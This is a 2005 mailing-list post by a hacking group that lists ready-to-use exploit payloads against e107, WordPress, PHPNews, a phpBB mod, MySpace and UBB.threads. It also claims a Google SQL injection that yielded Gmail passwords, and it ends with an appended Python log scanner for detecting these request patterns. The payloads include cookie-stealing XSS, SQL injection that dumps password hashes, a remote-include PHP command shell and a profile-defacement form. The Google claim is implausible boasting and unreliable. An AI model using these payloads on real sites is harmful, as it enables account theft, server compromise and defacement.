
| Subject: | Multiple CMS/Forum Vulnerabilities |
|---|---|
| Date: | Sat, 27 Aug 2005 20:36:10 -0400 |
```
##################################
## Multi-CMS/Forum Vulnerabilities
## Found by ap0c hackers
## pacifico & ratboy
##################################
```

Yo! Ok, well a couple new vulnerabilities have been found by.. us :)

------------------First; e107 xss---------------------

```
[link=http://w000000w00tw00t/asdadLI[link=onMouseOver='alert(document.cookie);' h1d3="]<[size=24]HIGHLIGHTME!!11!1!!!!!1111!!!!!!11!!1!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![/size]>[/link][link=h1d3me=']][/link][/link]
```

Enter this into any message, signature, et cetera, and when highlighted it will alert with the user's cookie. This *may* be further exploitable; but we are not sure; as we've been very busy ;)

------next; wordpress blog sql injection ---------

```
http://path/to/wordpress/index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*
```

This will give the administrator hash for the wordpress blog/CMS. We have also found that if you spoof your browser to something like: `<?php phpinfo(); ?>`, and have a failed login attempt; it is eval'd, and you can execute your own code.

------Now; PHPNews latest release remote include(); exploit------

```
http://path/to/php/news/auth.php?path=http://path/to/exploit/&c=uname%20-a
```

Ok, now you'll need a host, and change (http://path/to/exploit/) to your host. Now, you will make a directory called "languages". Then in a file named "en_GB.admin.lng", put something like this code:

```php
<?php $rawr=$_GET['c'];echo(`$rawr`);?>
```

kthx.

-----And; Knowledge Base PHPBB Mod SQL Injection Exploit-----

Righto.. so you find a phpbb forum that says: 'Powered by KnowledgeBase MOD, wGEric & Haplo (c) 2002-2005' at the bottom, eh? Now, this is totally vulnerable.
(the mod changes the index.php to kb.php)

```
http://path/to/forum/kb.php?mode=article&k=10%20UNION%20SELECT%200,user_password%20FROM%20phpbb_users%20WHERE%20user_id=2%20LIMIT%201/*%20&rush=%00
```

:)

-----!!!!!!Google.com!!!!!SQL!!!!!Injection!!!!!Exploit!!!!!!-----

Ok, we expect this to be fixed right away, so be sure to do it quick ;)
Giving google the query:

```
-b: *++*' UNION SELECT ass,ass from ASS,ass%00/*
```

Causes an error of "database gm-google.ass does not exist". We've gotten a few user/pass's for gmail with this ;)
This is done by confusing google's "calculator", so it does *NOT* check the query to make sure it's valid. You'd be surprised how insecure google is; when looked at closely. We also had a bindshell; but they found out; and that's fixed now.

-----MySpace.com User Profile Defacement.-----

Once again, this may be fixed very soon.
This code should be efficient;

```php
<?php
$g1=$_GET['t'];$g2=$_GET['f'];
echo('
<form action="http://myspace.com/index.cfm?fuseaction=user.addComment" method="post" name="commentForm">
<input type="hidden" name="hashcode" value="MIGKBgkrBgEEAYI3WAOgfTB7BgorBgEEAYI3WAMBoG0wawIDAgABAgJmAwICAMAECGU6VlkoYLOqBBCZiLLKnlWybUUua3SB/xxzBED1fsg4c0zRcY4B8IWZgNbTdYkd/pUk6zpuLXZZAhwC+oxKfrwgQfy+Qnj7XB4pXWTRvgumgCUHsjtspz8/kt6a">
<input type="hidden" name="FriendID" value="' . $f . '24822493">
<input type=hidden name=Mytoken value=' . $t . '>
');
echo ('<input type="hidden" name="f_comments" value='%3C%2FTD%3E%3C%2FTABLE%3E%3C%2FTD%3E%3C%2FTD%3E%3C%2FTABLE%3E%3C%2FTABLE%3E%3CTR%3E%3Cimg%20src%3D%22http%3A%2F%2Flemonparty.org%2Flemonparty.jpg%22%3E%3CFONT%20SIZE%3D%2224%22%20COLOR%3D%22RED%22%3E%3Cmarquee%20bgcolor%3D%22black%22%20direction%3D%22down%22%3Eowned.%3CBR%3E%3Cmarquee%20bgcolor%3D%22black%22%20direction%3D%22left%22%3Eby.%3CBR%3E%3Cmarquee%20bgcolor%3D%22black%22%20direction%3D%22up%22%3Eap0c.%3C%2Fmarquee%3E%3CBR%3E%3Cnoscript%3E'>
<input type="submit" value="Post Comment" onClick="this.disabled =true; document.commentForm.submit();">
</form>');
?>
```

example url: http://localhost/myspace0wn.php?t=20050827111256&f=6617

This would deface profile 6617 if the (t) variable is that user's friend. ktx.

-----Forums ("UBB.threads™ 6.3.2") Remote Code Execution.-----

These boards are very popular among corporate sites (*cough*NBC,CNN*cough*)

```
http://bo**ds.n**.***/bb/printthread.php?Board=%22);&main='));%3C?php%20phpinfo();%20?%3E&type=post
```

This would execute phpinfo(); on the victim's server.

```
############################
#### That's all for this
#### "issue" of sweet
#### sploits... sincerely
#### pacifico and ratboy
############################
```

Contact? jbiaso@gmail.com

-EOF-
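As an added example, not part of the post above, here is a defender-side Python scanner that pulls request targets out of web-server access-log lines, percent-decodes them repeatedly (so the double-encoded `%2527` in the WordPress payload is seen as a quote), and flags the request shapes this advisory describes: `UNION SELECT` with comment or null-byte truncation, a URL in a query parameter (remote include), injected PHP tags and inline event handlers. The log lines, addresses and the `example.invalid` host are constructed for the demo.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not from the advisory) in the request shapes it describes.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Aug/2005:20:36:10 -0400] "GET /wordpress/index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass)%20FROM%20wp_users/* HTTP/1.1" 200 512
10.0.0.6 - - [27/Aug/2005:20:37:01 -0400] "GET /news/auth.php?path=http://example.invalid/&c=uname%20-a HTTP/1.1" 200 1024
10.0.0.7 - - [27/Aug/2005:20:38:22 -0400] "GET /forum/kb.php?mode=article&k=10 HTTP/1.1" 200 2048
10.0.0.8 - - [27/Aug/2005:20:39:05 -0400] "GET /bb/printthread.php?Board=%22);&main='));%3C?php%20phpinfo();%20?%3E&type=post HTTP/1.1" 500 0
"""

REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

# (rule name, regex applied to the fully decoded request target)
RULES = [
    ("sqli_union", re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S)),
    ("sqli_comment_trunc", re.compile(r"/\*\s*$|\x00")),   # trailing /* or NUL byte
    ("remote_include", re.compile(r"[?&]\w+=(?:https?|ftp)://", re.I)),
    ("php_tag_injection", re.compile(r"<\?php\b", re.I)),
    ("js_event_handler", re.compile(r"\bon\w+\s*=", re.I)),
]

def normalise(target: str, rounds: int = 3) -> str:
    """Percent-decode until stable (bounded), so %2527 -> %27 -> ' is visible."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def scan_line(line: str) -> list[str]:
    """Names of every rule the request target of one log line matches."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    decoded = normalise(m.group(1))
    return [name for name, rx in RULES if rx.search(decoded)]

def scan_log(text: str) -> dict[int, list[str]]:
    """Map 1-based line numbers to findings; lines with no hits are omitted."""
    findings = {}
    for n, line in enumerate(text.splitlines(), start=1):
        hits = scan_line(line)
        if hits:
            findings[n] = hits
    return findings
```

Bounding the decode rounds matters: an attacker can nest encodings deeper than any fixed count, so treat a target that still changes after the last round as suspicious rather than clean.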